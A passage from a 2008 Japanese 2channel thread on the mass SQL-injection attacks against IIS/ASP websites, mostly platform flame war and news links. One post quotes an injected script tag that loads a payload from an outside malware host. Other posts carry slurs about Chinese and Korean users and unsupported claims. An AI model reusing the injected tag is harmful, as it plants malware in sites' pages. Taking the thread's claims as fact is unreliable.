さらにすこしするとLinuxベースも出た。

某政府系組織でアンチウイルスサーバが一番先に感染して
感染拡大した時期。
125 ：名刺は切らしておりまして：2008/05/04(日) 21:32:01 ID:EN7WKdMP: 今どきIIS使っているやついるの？
126 ：名刺は切らしておりまして：2008/05/04(日) 21:32:49 ID:jirpzHMr: >>90
>>>84それ関係ないよ。
>SQLインジェクションというのは、エスケープしそこねたSQLを実行することで引き起こされる脆弱性だから。
>どんな言語、どんなサーバを使っていても起こりうる問題で、ウェブサイトデベロッパーに責任がある。
>1-2年前に価格コムが同様の攻撃を受けたけど、あそこはApache+Perlだけど、別にApacheに責任があるわけじゃない。
>スタックオーバーフローなんかを使った攻撃に対する脆弱性とは別種の問題だ。

ヴァカ？
http://uptime.netcraft.com/up/graph?site=http://kakaku.com/
127 ：名刺は切らしておりまして：2008/05/04(日) 21:45:41 ID:MG7/Kc+/: IISもSQL Serverもちゃんとパッチ当ててチューニングしてやれば使えるらしいんだけど、
その辺の情報があんま出回ってないのが問題・・・
（つか、その辺が出来るほど頭のあるエンジニアなら大抵IIS使わないし・・・）

MS製品が叩かれる原因に、ソフトが云々ってのもそうだけど、使ってるベンダが
ｼｮﾎﾞくてコミュニティがレベル低いってのもあるかもね
128 ：名刺は切らしておりまして：2008/05/04(日) 21:47:57 ID:BXSdfmye: 自称エンジニアのオタ大集合ですねｗ
129 ：名刺は切らしておりまして：2008/05/04(日) 21:54:05 ID:8ECGkQ+V: あー
こりゃひどいな
130 ：名刺は切らしておりまして：2008/05/04(日) 21:54:35 ID:SClqKWcx: >>128

そりゃ>>90だけw
131 ：名刺は切らしておりまして：2008/05/04(日) 22:08:40 ID:8ECGkQ+V: >>65

素朴な疑問なんだが、
複数のSQL文をそのままスペースあけてくっつけてあるが
SQL-Serverでは普通にこんな文が通るのか？
;とか付けなくても実行されるの？
132 ：名刺は切らしておりまして：2008/05/04(日) 23:17:58 ID:DBj1YgOw: >>127
これが一番原因でしょ。　頭の悪いエンジニアがWindows担当する。

>（つか、その辺が出来るほど頭のあるエンジニアなら大抵IIS使わないし・・・）
133 ：名刺は切らしておりまして：2008/05/04(日) 23:21:39 ID:jICdpmpA: >>117
組み込み系ハードの某有名メーカーが…
134 ：名刺は切らしておりまして：2008/05/04(日) 23:22:19 ID:El0fuB1c: IIS/SQL Serverは、まったりと設定しても充分な性能が出る低負荷なシステムで使うべき。
セキュリティやパフォーマンスがクリティカルな案件ではLAMPやOracleを選択すべき。
135 ：名刺は切らしておりまして：2008/05/04(日) 23:41:23 ID:jD96RpZs: >>133
これもすごいｗ
GO WAY ! !<script src=http://www.nihaorr1.com/1.js></script ... - 23:39
倖田來未 avex network inc.
mu-mo.atmusic.jp/asx.asp?id=RBS0-N0028
136 ：名刺は切らしておりまして：2008/05/04(日) 23:47:54 ID:Jk7m5v6M: 普通にJava/Perl/PHPとかで作っておけばいいものを
わざわざIISでaspとかキワモノ路線狙うからだ…
137 ：名刺は切らしておりまして：2008/05/05(月) 01:11:31 ID:FoY30VVC: MSの反応はいつもながら遅いな
放置プレイか
138 ：名刺は切らしておりまして：2008/05/05(月) 17:32:18 ID:AokkBXNQ: >>132
>頭の悪いエンジニアがWindows担当する。

そういうこと。
139 ：名刺は切らしておりまして：2008/05/05(月) 18:47:52 ID:x2tI+Qfc: 会社の公開ＷＥＢサーバがＩＩＳで、インターネットからＦｏｒｔｉｇａｔｅを通してＩＩＳにいくようになっているんだけど問題ありでしょうか？
140 ：名刺は切らしておりまして：2008/05/05(月) 20:15:08 ID:Z6C6kjZZ: >>139
IIS使ってる以上ムリぽ
141 ：名刺は切らしておりまして：2008/05/05(月) 22:40:39 ID:BEF8sRRy: やっぱダメじゃんｗ
142 ：名刺は切らしておりまして：2008/05/05(月) 22:45:35 ID:HwKMcfLP: つまり、asp、aspxのサイトでクレカなんか使う奴は情報弱者ということでOK？
143 ：名刺は切らしておりまして：2008/05/05(月) 22:49:31 ID:xLzzeHIg: >>39
確か、Hotmailを買収して、かなりの台数をWindowsに入れ替えたら、
攻撃受けたりしてサービスの処理能力が追いつかなくなり、
あわててFreeBSDに戻したんだっけ。
144 ：名刺は切らしておりまして：2008/05/05(月) 22:56:51 ID:fDG2q//V: >>143
2chもFreeBSDだしな。
もっとも、2chをWIndows鯖なんかにしたら10秒と持たんがｗ
145 ：名刺は切らしておりまして：2008/05/06(火) 02:16:27 ID:d7jVno47: >>90
>>>84それ関係ないよ。
>SQLインジェクションというのは、エスケープしそこねたSQLを実行することで引き起こされる脆弱性だから。
>どんな言語、どんなサーバを使っていても起こりうる問題で、ウェブサイトデベロッパーに責任がある。
>1-2年前に価格コムが同様の攻撃を受けたけど、あそこはApache+Perlだけど、別にApacheに責任があるわけじゃない。
>スタックオーバーフローなんかを使った攻撃に対する脆弱性とは別種の問題だ。

ヴァカ？
http://uptime.netcraft.com/up/graph?site=http://kakaku.com/
146 ：名刺は切らしておりまして：2008/05/06(火) 17:23:54 ID:oLOv5QcI: だめだこりゃ
147 ：名刺は切らしておりまして：2008/05/06(火) 17:35:21 ID:xRf5dJTY: やっぱり、IISはだめだな

こういうのがあること自体、使うには値しない。
148 ：名刺は切らしておりまして：2008/05/06(火) 17:38:06 ID:yiGg65eH: IISがダメという奴はダメと言ってりゃ良い。ニートはそれで十分。
仕事ではそうはいかんのだよ。
149 ：名刺は切らしておりまして：2008/05/06(火) 18:00:12 ID:KFSFD/i1: なぜか、ここが紹介されていないので出しとくわ。
http://www.microsoft.com/japan/technet/security/guidance/sqlinjection.mspx
150 ：名刺は切らしておりまして：2008/05/06(火) 18:21:08 ID:xRf5dJTY: >>148
客からしたら、それで問題が出たら、君らを死ぬまで叩くだけだよ。

君らのような下等なIT奴隷に仕事振っても、自分たちはぬかってないからさ、
なにかあったら、君らを訴訟の対象とするだけ。

ましてやこういう話が出ていて、まんまと攻撃対象になったら、君らは責任
を問われるだけだよ。
151 ：名刺は切らしておりまして：2008/05/06(火) 19:15:59 ID:66Hv0+Cb: >>150
そしてMSはそれに対して何か保証してくれるわけでもない。
そう考えると、あのバカ高いライセンス費ってなに？
152 ：名刺は切らしておりまして：2008/05/06(火) 19:18:11 ID:k4YlNhXa: >>151
わからん、相談料と対策費とチューニング費用とテスト費用と
あとなんだっけ、まあなんせ別なんですよ
153 ：名刺は切らしておりまして：2008/05/06(火) 19:21:34 ID:KFSFD/i1: RHELとかだったら同じように高い金払うんじゃないの?
154 ：名刺は切らしておりまして：2008/05/07(水) 01:36:59 ID:m/487Wyd: >>79
さすが、MSの分割を阻止した猿大統領
155 ：名刺は切らしておりまして：2008/05/07(水) 09:44:05 ID:FCcM+UuQ: >>151
まさにボッタクリ
156 ：名刺は切らしておりまして：2008/05/07(水) 17:58:58 ID:PrKaffFL: 値段が高くてクラックされやすく、おまけに実質無保証ですか。。。
157 ：名刺は切らしておりまして：2008/05/07(水) 18:10:40 ID:TKzwClMk: 高い？ニートってこえーなｗ
仕事には納期と予算があってな、結局安上がりになるんだよ
158 ：名刺は切らしておりまして：2008/05/07(水) 18:13:03 ID:r7ognVvB: >>157

でも、サウンドハウスさんとかは後から大変大きなツケをお払いになったようですがｗ
159 ：名刺は切らしておりまして：2008/05/07(水) 18:59:36 ID:pFVYRuVl: 「SQLインジェクション・ワーム」出現、Webサイトを自動的に改ざん
http://itpro.nikkeibp.co.jp/article/NEWS/20080507/300803/
http://isc.sans.org/diary.html?storyid=4393

IIS以外は大丈夫と思ってたヴァカ、ワームになっちまったぞ
160 ：名刺は切らしておりまして：2008/05/07(水) 19:07:14 ID:cXk96bs8: >>159
「ワーム」に感染して周辺に迷惑かけるのって、Windows鯖だけじゃんｗ
グルーバルネットワークにWindow鯖接続禁止になりゃいいのに。
161 ：名刺は切らしておりまして：2008/05/07(水) 19:16:09 ID:uHf/WohV: >>160

Windowsクライアントがワームを飼ってWindows鯖をクラックか？
こんなことでネットの帯域を食われるのは大迷惑だな。
いいかげんWindowsでのインターネットは禁止にしろよｗ
162 ：名刺は切らしておりまして：2008/05/07(水) 21:20:57 ID:AGTXzldf: >>161
出来の悪い欠陥車で道路を占有するようなもんだしな。
いい加減勘弁してくれよ。
163 ：名刺は切らしておりまして：2008/05/08(木) 04:21:02 ID:ZvTapOaN: >>162
相当の高い金はらったところだけ安全に利用できるのは道路と同じだろ

叩きまくればいいってもんではないんだぞ
164 ：名刺は切らしておりまして：2008/05/08(木) 04:36:17 ID:9Z/EY0rx: >>163
なんだこの資本主義覚えたての中国人はｗ
165 ：名刺は切らしておりまして：2008/05/08(木) 04:39:35 ID:f6TcYfxT: 高い金払って欠陥車買わされたなら怒るわな、普通。
166 ：名刺は切らしておりまして：2008/05/08(木) 04:40:11 ID:iOCUUorZ: IISって、ネット公開するのにクライアントライセンスは
どうなってるんだ？　
ググるとわざわざ分かりにくいようにしてるとしか思えないな。
社内公開専用にしといてーってことじゃねーのwwwww
167 ：名刺は切らしておりまして：2008/05/08(木) 04:56:28 ID:Z0BokHKY: M$は公式に否定してるよね、「IISのせいじゃねぇぞゴルァ」
168 ：名刺は切らしておりまして：2008/05/08(木) 05:09:14 ID:LLPr0Qg3: >>164
>>165
なら、車検もない高級車とでも例えられないのか
169 ：名刺は切らしておりまして：2008/05/09(金) 07:30:47 ID:Lt4KQp3i: >>168
いや、高級じゃないしｗ
170 ：名刺は切らしておりまして：2008/05/09(金) 07:32:28 ID:KN/IGDo7: バカと貧乏人とその両方だらけｗ
171 ：名刺は切らしておりまして：2008/05/09(金) 07:35:08 ID:qzOn+/io: >>170
>バカと貧乏人

MSの一番のお得意様ですね。わかります。
172 ：名刺は切らしておりまして：2008/05/09(金) 21:05:01 ID:ko4jpxkd: ところで正直
LinuxとFreeBSDってどっちが良いの？
173 ：名刺は切らしておりまして：2008/05/09(金) 21:07:45 ID:ipQXnThD: BSDは正統派だが、安定しないとjavaなどの開発環境が揃いがたい
Linuxはなんでもあり、というわけでもないがいろいろやる　癖　がある
174 ：名刺は切らしておりまして：2008/05/10(土) 00:22:46 ID:SNZq3RsX: 2chがBSDでニコニコがLinuxってのも、なんとなくOSの性質に
マッチしてる気がするな
175 ：名刺は切らしておりまして：2008/05/10(土) 01:06:09 ID:XbuIWiTT: >>174
どっちもWindows鯖なんかじゃ怖くて運用できないところは共通してるなｗ
176 ：名刺は切らしておりまして：2008/05/10(土) 01:19:24 ID:3/zMD2IW: >>148
「丸投げしかできない無能な大手SI」や「下請けの土方」じゃ選択権ないしな。
177 ：名刺は切らしておりまして：2008/05/10(土) 04:02:32 ID:XNKH+9rY: Linuxが不安定とよく言われるけどあくまで比較対照は商用UNIXとの比較だからね。
しかも初期の頃の評価だ。Windowsとの比較ではLinuxが圧倒的に安定という評価でOK

今のLinuxは世界中のベンダーが共同で開発やデバッグしているようなものだから。
ものすごい勢いで不安定な部分は潰され、急速に安定してきている。
日本のベンダーは評価基準厳しいからデバッグでかなり貢献しているよ。

Irixからchkconfig solarisからpumなど商用OSの機能が
商用OSのベンダーの手により移植されている。
178 ：名刺は切らしておりまして：2008/05/10(土) 16:13:57 ID:zfhmBbVs: 中国サイトのサーバを見るとほとんどが
Windows2003上のIIS6だな

９割方違法コピーだと思うが
179 ：名刺は切らしておりまして：2008/05/10(土) 18:49:19 ID:XNKH+9rY: 韓国はやたらと違法コピーのM$　SQLサーバ多いようだね。
以前ワーム流行した時に殆どの回線ダウンしたぐらいだからね。
180 ：名刺は切らしておりまして：2008/05/10(土) 19:18:33 ID:SNZq3RsX: 違法コピーしてまでWIn鯖を使いたい気持ちが良く分からんよな
なんかMSに対するコンプレックスでもあるんだろうか
181 ：名刺は切らしておりまして：2008/05/11(日) 04:53:09 ID:4tESbig+: もうMS製品は中韓専用でよくね？
182 ：名刺は切らしておりまして：2008/05/11(日) 22:53:53 ID:RDmaDBeY: 「MSのブログ検閲は中国政府より過激」著名ブロガーが批判

マイクロソフト社が投稿をブロックしている禁止語には、「台湾独立」、「ダライ・ラマ」、
「人権」、「自由」、「民主主義」などがある。

マイクロソフト社は中国政府が実施している検閲の基準を超えているという。政府の検閲では
、共産主義政府による統治を危うくする言論については断固として対処するが、「自由」のよ
うな言葉まで公然と禁止しているわけではないというのだ。

http://wiredvision.jp/archives/200506/2005062204.html
183 ：名刺は切らしておりまして：2008/05/12(月) 23:54:01 ID:/EliyXoR: だめだこりゃ
184 ：名刺は切らしておりまして：2008/05/13(火) 12:57:06 ID:UIiH0oyY: いい加減にしろ！
Windowsサーバー使い奴はアホ

ホントに世界が迷惑してるんだよ
Windowsは選択肢にないの！
185 ：名刺は切らしておりまして：2008/05/13(火) 19:47:59 ID:q+CSvsiB: いい加減にしろ！
Windowsサーバー使い奴はアホ

ホントに世界が迷惑してるんだよ
Windowsは選択肢にないの～！
186 ：名刺は切らしておりまして：2008/05/14(水) 01:16:40 ID:s/8UD+Os: >>181
もうダマせるのは中韓ぐらいだろうしな...。
187 ：名刺は切らしておりまして：2008/05/14(水) 01:34:41 ID:MCj1Bs4Q: 韓国もActiveX地獄に陥っているから流石に懲りたんじゃね?
188 ：名刺は切らしておりまして：2008/05/14(水) 02:03:24 ID:G41LnnuF: >>151
案外大手のソフト屋が高い金でMS製品を入れる理由なぁ。

・馬鹿な官庁相手で仕事が取りやすいから。
　実際「Linuxなんて誰が保証してくれるんだ！」とかいう事を言う
　「MSなら安心」とか言う

・VB6からVB.NETへ流れた関連会社や外注を安く使えるから。
　大手の子/関連会社なんて、社内は未だにVB6しか知らないようなのがワンサカ余ってる
　web系も「cssって単語覚えました」みたいなレベルのが大量に余ってる
　それは「不正アクセス行為になりますから、正規の手順ではないのでサポート出来ません」とかも言うぞw
189 ：名刺は切らしておりまして：2008/05/14(水) 02:11:58 ID:BFkjfT6C: >>188

ダマされやすいバカが多い国の話されてもなあ。
http://japan.cnet.com/column/korea/story/0,2000067066,20343329,00.htm
190 ：名刺は切らしておりまして：2008/05/14(水) 02:16:53 ID:W4+gG2jg: つまりゲイツが悪と？
191 ：名刺は切らしておりまして：2008/05/14(水) 02:43:12 ID:G41LnnuF: >>189
お隣のActiveXは笑えたが、日本国内も笑えん状態だよ
192 ：名刺は切らしておりまして：2008/05/14(水) 02:46:41 ID:/I697rqc: 他人の振り見てじゃないが、ActivXとIISの撤廃は国是だな
193 ：名刺は切らしておりまして：2008/05/14(水) 09:46:49 ID:BekfOWkv: 実際WindowsのエンジニアとUNIXのエンジニアでは
レベルが違いすぎるからなあ
194 ：名刺は切らしておりまして：2008/05/14(水) 12:57:39 ID:dzSAy5tp: Windowsのエンジニア10万人とUNIXのエンジニア一人が等しい能力だそうだよ。
もうWindowsの時代は終わったんだよ。
195 ：名刺は切らしておりまして：2008/05/14(水) 20:37:30 ID:0C5y9hqg: それはいえる
196 ：名刺は切らしておりまして：2008/05/14(水) 21:29:40 ID:/LXrP6gP: レベルが違うから安く使えるんだけどな。

でもUNIXエンジニアとUNIXも触れる程度のエンジニアは別だよ。
Windows系の香具師らの立てたUNIXサーバは穴だらけだったからね。
不要サービス山のように上げていて気持ち悪い。

自称LinuxエンジニアもWindows系に毛の生えただけのが多いから
最低限RedHatCEは必須でしょ。

UNIX系で仕事してたならRedHatCEは結構楽勝
Linux固有問題3割ぐらいだ。

合格率低いのは独習でコマンド使える程度が
講習受けただけの香具師が多いからかな。

講習会いってまじめに勉強したのが落ちて
会社命令で何の準備もなく受けた某外資系の香具師が簡単に合格してた。

sambaって踊るのか？　には吹いた。
197 ：名刺は切らしておりまして：2008/05/14(水) 21:35:35 ID:ARdoUUgh: 富士山マガジンサービスは12日、同社が運営する雑誌専門の
オンライン書店サイト「Fujisan.co.jp」が改竄され、閲覧者のPCに
ウイルスをダウンロードさせるコードが埋め込まれていたことを
明らかにした。

http://uptime.netcraft.com/up/graph?site=http://fujisan.co.jp/

急遽Linux鯖に。わろたｗ
198 ：名刺は切らしておりまして：2008/05/14(水) 21:36:32 ID:S9s4XPfr: IISといえばきのう超大口ユーザのJTBが早朝から夕方までメンテで閉鎖してたな。すごい機会損失ｗ
MS製品のすさまじい可用性を見たわｗｗｗ
199 ：名刺は切らしておりまして：2008/05/15(木) 06:05:28 ID:UCDujJxz: >>198
大損害ｗ
200 ：名刺は切らしておりまして：2008/05/15(木) 07:02:50 ID:5evj2zkj: アフォなWindowsサーバを使いかつクラスタも組んでいなかったという事かな？
201 ：名刺は切らしておりまして：2008/05/15(木) 07:48:31 ID:Lna/M/LK: お前らニートの視野の狭さはすばらしいｗ
202 ：名刺は切らしておりまして：2008/05/15(木) 08:15:58 ID:Q7szcb28: 弊社WEBサイト改竄に関するお知らせ
http://www.fujisan.co.jp/HTML/INFO/notice080508.htm
203 ：名刺は切らしておりまして：2008/05/15(木) 11:37:32 ID:VSPJD5Mi: >>202
SQLインジェクションかぁ
javaとかならprepare使うから大丈夫なのになぁ
aspダメポ
204 ：名刺は切らしておりまして：2008/05/15(木) 23:06:21 ID:41BVAumJ: なんでIISなんか使ってるん？
205 ：名刺は切らしておりまして：2008/05/15(木) 23:12:33 ID:W+cOriTr: 馬鹿だから
206 ：名刺は切らしておりまして：2008/05/15(木) 23:48:24 ID:7s1hVxC+: >>204
安かろう悪かろうだから
それに気付けないから
207 ：名刺は切らしておりまして：2008/05/16(金) 22:32:56 ID:7S5z7r19: >>204
給料安くてもいいという失業寸前のﾊﾞｶVB奴隷が腐るほどいるから

51 KB [ ２ちゃんねる３億PV/日をささえるレンタルサーバー \877/2TB/100Mbps]

取りに行ったけどなかった。次は一時間後に取りに行くです。新着レスの表示

掲示板に戻る全部前100 次100 最新50

read.cgi ver 05.0.4.9 2007/06/21
FOX ★ DSO(Dynamic Shared Object)